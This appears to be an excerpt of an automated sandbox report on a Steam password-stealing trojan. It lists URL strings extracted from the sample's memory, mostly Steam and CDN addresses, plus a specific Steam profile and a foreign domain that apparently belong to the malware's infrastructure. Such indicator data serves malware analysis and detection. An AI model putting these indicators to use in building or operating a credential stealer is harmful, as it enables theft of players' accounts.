          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=puGcKUBV
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WRaH
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=09hfUHwxDUY7&l=e
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259$
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259ex
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259r
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://store.steampowered.c
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
